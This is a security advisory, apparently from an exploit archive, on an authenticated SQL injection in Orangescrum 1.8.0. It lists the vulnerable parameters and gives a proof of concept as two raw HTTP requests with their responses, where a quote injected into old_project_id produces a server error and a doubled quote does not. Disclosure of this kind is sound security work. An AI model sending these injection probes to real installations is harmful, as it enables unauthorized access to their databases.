Orangescrum 1.8.0 SQL Injection

2021.11.29
Credit: Hubert Wojciechowski
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: orangescrum 1.8.0 - 'Multiple' SQL Injection (Authenticated) # Date: 28/11/2021 # Exploit Author: Hubert Wojciechowski # Contact Author: snup.php@gmail.com # Company: https://redteam.pl # Vendor Homepage: https://www.orangescrum.org/ # Software Link: https://www.orangescrum.org/ # Version: 1.8.0 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ### SQL Injection # Authenticated user ----------------------------------------------------------------------------------------------------------------------- # POC ----------------------------------------------------------------------------------------------------------------------- ## Example vuln parameters: * project_id * old_project_id * uuid * uniqid * projid * id * caseno ----------------------------------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------------------------------------------- ## Example ----------------------------------------------------------------------------------------------------------------------- Req old_project_id=1' - error ----------------------------------------------------------------------------------------------------------------------- POST /orangescrum/easycases/move_task_to_project HTTP/1.1 Origin: http://127.0.0.1 Content-Length: 64 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Sec-Fetch-Site: same-origin Host: 127.0.0.1:80 Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Connection: close X-Requested-With: XMLHttpRequest Sec-Fetch-Mode: cors Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; LAST_CREATED_PROJ=3; TASKGROUPBY=duedate; ALL_PROJECT=all; CURRENT_FILTER=assigntome; STATUS=2 Referer: http://127.0.0.1/orangescrum/dashboard Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Sec-Fetch-Dest: empty project_id=3&old_project_id=2'&case_id=2&case_no=1&is_multiple=0 ----------------------------------------------------------------------------------------------------------------------- Res: ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 500 Internal Server Error Date: Sun, 28 Nov 2021 12:42:30 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Content-Length: 132182 Vary: User-Agent Expires: access 12 month Connection: close [...] ----------------------------------------------------------------------------------------------------------------------- Req old_project_id=1'' - not error ----------------------------------------------------------------------------------------------------------------------- POST /orangescrum/easycases/move_task_to_project HTTP/1.1 Origin: http://127.0.0.1 Content-Length: 66 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Sec-Fetch-Site: same-origin Host: 127.0.0.1:80 Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Connection: close X-Requested-With: XMLHttpRequest Sec-Fetch-Mode: cors Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; LAST_CREATED_PROJ=3; TASKGROUPBY=duedate; ALL_PROJECT=all; CURRENT_FILTER=assigntome; STATUS=2 Referer: http://127.0.0.1/orangescrum/dashboard Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Sec-Fetch-Dest: empty project_id=3&old_project_id=2'';&case_id=2&case_no=1&is_multiple=0 ----------------------------------------------------------------------------------------------------------------------- Res ----------------------------------------------------------------------------------------------------------------------- HTTP/1.1 200 OK Date: Sun, 28 Nov 2021 12:51:23 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1 Vary: User-Agent Expires: access 12 month Content-Length: 1 Connection: close Content-Type: text/html; charset=UTF-8 0


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top